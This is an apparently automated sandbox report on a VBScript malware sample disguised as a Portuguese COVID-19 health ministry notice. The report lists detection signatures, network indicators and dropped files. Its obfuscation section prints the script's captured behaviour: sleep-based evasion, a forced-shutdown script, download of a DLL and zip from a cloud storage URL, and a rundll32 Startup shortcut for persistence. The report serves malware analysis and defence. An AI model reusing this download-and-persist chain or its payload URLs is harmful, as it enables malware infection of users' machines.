Loading ...

Play interactive tourEdit tour

Analysis Report Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs

Overview

General Information

Sample Name:Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs
Analysis ID:338695
MD5:462d612fcc6ce92ac4d1b58a27e4ecac
SHA1:405633f2a4fe5b859ea9331a2276ebd494d39aa4
SHA256:2bedcf94c9aea7b126f70169728f38678d615cdc26991c3b30628912eb2766d9

Most interesting Screenshot:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Detected VMProtect packer
Machine Learning detection for dropped file
Potential evasive VBS script found (sleep loop)
Potential malicious VBS script found (has network functionality)
Windows Shell Script Host drops VBS files
Contains capabilities to detect virtual machines
Creates a start menu entry (Start Menu\Programs\Startup)
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Stores files to the Windows start menu directory

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 6500 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\64317583203315\wkoyrphebhxonpimm60602927029132.dllAvira: detection malicious, Label: TR/Black.Gen2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\P-16-5[1].dllAvira: detection malicious, Label: TR/Black.Gen2
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\64317583203315\wkoyrphebhxonpimm60602927029132.dllJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\P-16-5[1].dllJoe Sandbox ML: detected

Networking:

barindex
Potential malicious VBS script found (has network functionality)Show sources
Source: Initial file: .write ZXDFVHIJXTXNZLNYYGEJOJNR.responseBody
Source: Initial file: .savetofile LJETZISNBGIJOFCVGWUIZSLT, 2
Source: Initial file: .write BFLCAJXFUHBOZFMBDCLJVIWJ.responseBody
Source: Initial file: .savetofile SASLHXXIDQYMUYFJXVRVATCD, 2
Source: Joe Sandbox ViewIP Address: 8.8.8.8 8.8.8.8
Source: Joe Sandbox ViewIP Address: 8.8.8.8 8.8.8.8
Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
Source: wscript.exe, 00000000.00000002.625204704.00000267D3917000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000002.625058548.00000267D38F8000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: wscript.exe, 00000000.00000002.625204704.00000267D3917000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: wscript.exe, 00000000.00000002.625410259.00000267D3954000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/
Source: wscript.exe, 00000000.00000002.625204704.00000267D3917000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
Source: wscript.exe, 00000000.00000002.625369858.00000267D3949000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1
Source: wscript.exe, 00000000.00000002.625058548.00000267D38F8000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: wscript.exe, 00000000.00000002.625058548.00000267D38F8000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: wscript.exe, 00000000.00000002.625058548.00000267D38F8000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
Source: wscript.exe, 00000000.00000002.625204704.00000267D3917000.00000004.00000001.sdmpString found in binary or memory: https://pki.goog/repository/0
Source: wscript.exe, 00000000.00000002.624861164.00000267D3801000.00000004.00000001.sdmpString found in binary or memory: https://storage.googleapis.com/
Source: wscript.exe, 00000000.00000002.624861164.00000267D3801000.00000004.00000001.sdmpString found in binary or memory: https://storage.googleapis.com/Q
Source: wscript.exe, wscript.exe, 00000000.00000002.625308882.00000267D393E000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.624659194.00000267D37A8000.00000004.00000001.sdmpString found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zip
Source: wscript.exe, 00000000.00000002.624659194.00000267D37A8000.00000004.00000001.sdmpString found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zipB)
Source: wscript.exe, 00000000.00000002.620238246.00000267D18A1000.00000004.00000001.sdmpString found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zip_)ik$
Source: wscript.exe, wscript.exe, 00000000.00000002.625308882.00000267D393E000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.625204704.00000267D3917000.00000004.00000001.sdmpString found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dll
Source: wscript.exe, 00000000.00000002.620238246.00000267D18A1000.00000004.00000001.sdmpString found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dllMenu
Source: wscript.exe, 00000000.00000002.625204704.00000267D3917000.00000004.00000001.sdmpString found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dllY

System Summary:

barindex
Detected VMProtect packerShow sources
Source: P-16-5[1].dll.0.drStatic PE information: .vmp0 and .vmp1 section names
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\P-16-5[1].dll E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\64317583203315\wkoyrphebhxonpimm60602927029132.dll E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651
Source: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbsInitial sample: Strings found which are bigger than 50
Source: P-16-5[1].dll.0.drStatic PE information: Number of sections : 12 > 10
Source: classification engineClassification label: mal92.evad.winVBS@1/6@0/2
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\phewmqhjwxh.vbsJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs'
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior

Data Obfuscation:

barindex
VBScript performs obfuscated calls to suspicious functionsShow sources
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell")WScript.Sleep(300000)Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_& "Primary=true")for each OpSys in OpSysSetretVal = OpSys.Win32Shutdown(6)nextIHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Roaming\phewmqhjwxh.vbs", "true");ITextStream.Write("Set SFHISGAPSMULDDGFLMFHDFTG = CreateObject("WScript.Shell")");ITextStream.Write("WScript.Sleep(300000)");ITextStream.Write("Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _");ITextStream.Write("& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_");ITextStream.Write("& "Primary=true")");ITextStream.Write("for each OpSys in OpSysSet");ITextStream.Write("retVal = OpSys.Win32Shutdown(6)");ITextStream.Write("next");ITextStream.Close();IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk", "true");IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs", "true");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateFolder("C:\Users\user\AppData\Roaming\64317583203315");IWshShell3.SpecialFolders("AppData");IWshShell3.SpecialFolders("AppData");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/0.zip", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\0.zip", "2");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/P-16-5.dll", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\64317583203315\wkoyrphebhxonpimm60602927029132.dll", "2");IHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("StartUp");IHost.CreateObject("WScript.Shell");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tgwpxyohqm .lnk");IWshShortcut.TargetPath("rundll32");IWshShortcut.Arguments(" C:\Users\user\AppData\Roaming\64317583203315\wkoyrphebhxonpimm60602927029132.dll SFsb9V5o7LTfxDWhDoh");IWshShortcut.WindowStyle("1");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tgwpxyohqm");IWshShortcut.Save();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Roaming\phewmqhjwxh.vbs");ITextStream.ReadAll();ITextStream.Close();IHost.Sleep("300000");ISWbemServicesEx.ExecQuery("select * from Win32_OperatingSystem where Primary=true");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01000001("6")
Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
Source: P-16-5[1].dll.0.drStatic PE information: section name: .didata
Source: P-16-5[1].dll.0.drStatic PE information: section name: .vmp0
Source: P-16-5[1].dll.0.drStatic PE information: section name: .vmp1

Persistence and Installation Behavior:

barindex
Windows Shell Script Host drops VBS filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\phewmqhjwxh.vbsJump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\64317583203315\wkoyrphebhxonpimm60602927029132.dllJump to dropped file
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\P-16-5[1].dllJump to dropped file
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tgwpxyohqm .lnkJump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tgwpxyohqm .lnkJump to behavior
Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Potential evasive VBS script found (sleep loop)Show sources
Source: Initial fileInitial file: CRZSCDGSMROZDYBDQERIQAJU.Write "WScript.Sleep(300000)" & vbCrLf
Source: C:\Windows\System32\wscript.exeDropped file: WScript.Sleep(300000)Jump to dropped file
Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\64317583203315\wkoyrphebhxonpimm60602927029132.dllJump to dropped file
Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\P-16-5[1].dllJump to dropped file
Source: wscript.exe, 00000000.00000002.625916016.00000267D3E40000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.624861164.00000267D3801000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000002.625916016.00000267D3E40000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.625916016.00000267D3E40000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.625916016.00000267D3E40000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: P-16-5[1].dll.0.drJump to dropped file
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\wscript.exeNetwork Connect: 108.177.96.128 187Jump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting421Startup Items1Startup Items1Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution1Registry Run Keys / Startup Folder2Process Injection1Virtualization/Sandbox Evasion1LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsPowerShell1Logon Script (Windows)Registry Run Keys / Startup Folder2Process Injection1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting421NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\64317583203315\wkoyrphebhxonpimm60602927029132.dll100%AviraTR/Black.Gen2
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\P-16-5[1].dll100%AviraTR/Black.Gen2
C:\Users\user\AppData\Roaming\64317583203315\wkoyrphebhxonpimm60602927029132.dll100%Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\P-16-5[1].dll100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
http://ocsp.pki.goog/gsr2020%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
https://pki.goog/repository/00%URL Reputationsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://ocsp.pki.goog/gts1o1core00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
http://ocsp.pki.goog/gts10%VirustotalBrowse
http://ocsp.pki.goog/gts10%Avira URL Cloudsafe
http://ocsp.pki.goog/0%VirustotalBrowse
http://ocsp.pki.goog/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://pki.goog/gsr2/GTS1O1.crt0wscript.exe, 00000000.00000002.625058548.00000267D38F8000.00000004.00000001.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://crl.pki.goog/gsr2/gsr2.crl0?wscript.exe, 00000000.00000002.625204704.00000267D3917000.00000004.00000001.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://ocsp.pki.goog/gsr202wscript.exe, 00000000.00000002.625204704.00000267D3917000.00000004.00000001.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
https://pki.goog/repository/0wscript.exe, 00000000.00000002.625204704.00000267D3917000.00000004.00000001.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://ocsp.pki.goog/gts1o1core0wscript.exe, 00000000.00000002.625058548.00000267D38F8000.00000004.00000001.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://crl.pki.goog/GTS1O1core.crl0wscript.exe, 00000000.00000002.625058548.00000267D38F8000.00000004.00000001.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://ocsp.pki.goog/gts1wscript.exe, 00000000.00000002.625369858.00000267D3949000.00000004.00000001.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://ocsp.pki.goog/wscript.exe, 00000000.00000002.625410259.00000267D3954000.00000004.00000001.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious
8.8.8.8
unknownUnited States
15169GOOGLEUSfalse
108.177.96.128
unknownUnited States
15169GOOGLEUStrue

General Information

Joe Sandbox Version:31.0.0 Red Diamond
Analysis ID:338695
Start date:12.01.2021
Start time:18:56:18
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 9m 8s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:31
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal92.evad.winVBS@1/6@0/2
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .vbs
Warnings:
Show All
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, rundll32.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

TimeTypeDescription
18:57:50AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tgwpxyohqm .lnk

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
8.8.8.8BadStuff.jsGet hashmaliciousBrowse
  • 8.8.8.8/SlvMWdIEW62C9c
BadStuff.jsGet hashmaliciousBrowse
  • 8.8.8.8/CTM5wttwLFcLdHfVk
33payment advice.exeGet hashmaliciousBrowse
  • www.zulinfang.mobi/fu/?id=i07vHMa0svfKfxE6I3aRHA3lctcdYaT9x0iZT9MH0oRhMFPgh9mSEtNU17XFCBgMQA4XWErQDlzTwB-AplygzQ..
37documents.exeGet hashmaliciousBrowse
  • www.tasteofunexpected.com/tf/?id=y6IrbpvfhkYfQXXyqC8dooAvfrv2e2apV7igF70LYGyF4OCvwj5JxRVBdRghvKGGuc_KsFbnbWPC0Def
63AWB 043255.exeGet hashmaliciousBrowse
  • www.serikatsaudagarnusantara.com/ed/?id=kIz4OnF7tHMqdv1cSepeHoY02Vsws5yCI7zf8DN1pvMb9hdHFpZX44eSyhzXC7u5icfl1yYYsvfyl6we
d62c.exeGet hashmaliciousBrowse
  • www.epckednilm.info/fu/?id=i07vHMa0svfKfxE6I3aRHA3lctcdYaT9x0iZT9MH0oRhMFPgh9mSEtNU17XFCBgMQA4XWErQDlzTwB-AplygzQ..
27TTcopyMT107-36000_payment.exeGet hashmaliciousBrowse
  • www.watchsummer.com/tr/?id=oqCXvgIUiCxPFtn1J0rb33q5mpSH48Vd1XRAfBxi4MgNDwsdTt0dcXb5dgzj2vPAuld1RDreAlRWWLP9Xot16w..&sql=1
download_adobeflashplayer_install_9_.exeGet hashmaliciousBrowse
  • wetr34.sitesled.com/wind.jpg
INV-000524.vbsGet hashmaliciousBrowse
  • naturofind.org/p66/JIKJHgft
177Purchase Order.exeGet hashmaliciousBrowse
  • www.phutungototp.com/ho/?id=y3T6nEBciedL7htO4xn1ZYijVAw7sJXLjwubagvJUtMFVf7aOWPSa_Bl5i178f_EjROvybrSr7PC3267XbUsBg..
8Order Inquiry.exeGet hashmaliciousBrowse
  • www.quyuar.com/dr/?id=gCqdDQsh4d7ynFKSj09V1Y12J91NTUfM9LddDKzxEGHO7R4ogEQ3AGAU2DRYiF_Nduo4Rd-EW24x-O38aOud_g..
27Tobye.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin
11Marena.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin
39Harriot.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin
1Vida.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin
43Colleen.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin
67Roxanne.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin
15Winnah.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin
33Elfrida.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin
25Cornelle.jsGet hashmaliciousBrowse
  • my.internaldating.ru/js/boxun4.bin

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
GOOGLEUSCovid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbsGet hashmaliciousBrowse
  • 74.125.143.128
rT3Nb3Nhqp.exeGet hashmaliciousBrowse
  • 34.102.136.180
Order_385647584.xlsxGet hashmaliciousBrowse
  • 34.102.136.180
correos-1.apkGet hashmaliciousBrowse
  • 108.177.126.139
PO890299700006.xlsxGet hashmaliciousBrowse
  • 34.102.136.180
6OUYcd3GIs.exeGet hashmaliciousBrowse
  • 34.102.136.180
correos-1.apkGet hashmaliciousBrowse
  • 172.217.218.102
Consignment Details.exeGet hashmaliciousBrowse
  • 34.102.136.180
1.htmlGet hashmaliciousBrowse
  • 108.177.126.132
mscthef-Fichero-ES.msiGet hashmaliciousBrowse
  • 108.177.126.132
yaQjVEGNEb.exeGet hashmaliciousBrowse
  • 34.102.136.180
quote.exeGet hashmaliciousBrowse
  • 34.102.136.180
Shipping Documents PL&BL Draft.exeGet hashmaliciousBrowse
  • 34.102.136.180
Purchase Order -263.exeGet hashmaliciousBrowse
  • 34.102.136.180
payment advice00000789_pdf.exeGet hashmaliciousBrowse
  • 34.102.136.180
Duty checklist and PTP letter.exeGet hashmaliciousBrowse
  • 34.102.136.180
order no. 43453.exeGet hashmaliciousBrowse
  • 34.102.136.180
zz4osC4FRa.exeGet hashmaliciousBrowse
  • 34.102.136.180
DTwcHU5qyI.exeGet hashmaliciousBrowse
  • 34.102.136.180
5j6RsnL8zx.exeGet hashmaliciousBrowse
  • 34.102.136.180
GOOGLEUSCovid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbsGet hashmaliciousBrowse
  • 74.125.143.128
rT3Nb3Nhqp.exeGet hashmaliciousBrowse
  • 34.102.136.180
Order_385647584.xlsxGet hashmaliciousBrowse
  • 34.102.136.180
correos-1.apkGet hashmaliciousBrowse
  • 108.177.126.139
PO890299700006.xlsxGet hashmaliciousBrowse
  • 34.102.136.180
6OUYcd3GIs.exeGet hashmaliciousBrowse
  • 34.102.136.180
correos-1.apkGet hashmaliciousBrowse
  • 172.217.218.102
Consignment Details.exeGet hashmaliciousBrowse
  • 34.102.136.180
1.htmlGet hashmaliciousBrowse
  • 108.177.126.132
mscthef-Fichero-ES.msiGet hashmaliciousBrowse
  • 108.177.126.132
yaQjVEGNEb.exeGet hashmaliciousBrowse
  • 34.102.136.180
quote.exeGet hashmaliciousBrowse
  • 34.102.136.180
Shipping Documents PL&BL Draft.exeGet hashmaliciousBrowse
  • 34.102.136.180
Purchase Order -263.exeGet hashmaliciousBrowse
  • 34.102.136.180
payment advice00000789_pdf.exeGet hashmaliciousBrowse
  • 34.102.136.180
Duty checklist and PTP letter.exeGet hashmaliciousBrowse
  • 34.102.136.180
order no. 43453.exeGet hashmaliciousBrowse
  • 34.102.136.180
zz4osC4FRa.exeGet hashmaliciousBrowse
  • 34.102.136.180
DTwcHU5qyI.exeGet hashmaliciousBrowse
  • 34.102.136.180
5j6RsnL8zx.exeGet hashmaliciousBrowse
  • 34.102.136.180

JA3 Fingerprints

No context

Dropped Files

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
C:\Users\user\AppData\Roaming\64317583203315\wkoyrphebhxonpimm60602927029132.dllCovid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbsGet hashmaliciousBrowse
    Financeiro-JTQEFA-28-10-2020-167.vbsGet hashmaliciousBrowse
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\P-16-5[1].dllCovid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbsGet hashmaliciousBrowse
        Financeiro-JTQEFA-28-10-2020-167.vbsGet hashmaliciousBrowse

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0[1].zip
          Process:C:\Windows\System32\wscript.exe
          File Type:Zip archive data, at least v2.0 to extract
          Category:downloaded
          Size (bytes):5615495
          Entropy (8bit):7.999967059766371
          Encrypted:true
          SSDEEP:98304:Bh5gN8bU/nWlAULiFNZ6uOoslTKFFJA01YsodrEhKsf/gvVPuysUhB0:BkN8gfWlLo6uOoRFJZYrxsf/gxuy9u
